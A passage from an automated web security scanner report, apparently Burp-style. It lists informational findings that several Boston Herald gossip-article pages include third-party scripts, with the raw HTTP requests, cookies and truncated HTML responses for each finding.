Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.752. http://www.bostonherald.com/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.753. http://www.bostonherald.com/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.754. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.755. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.756. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.757. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.758. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

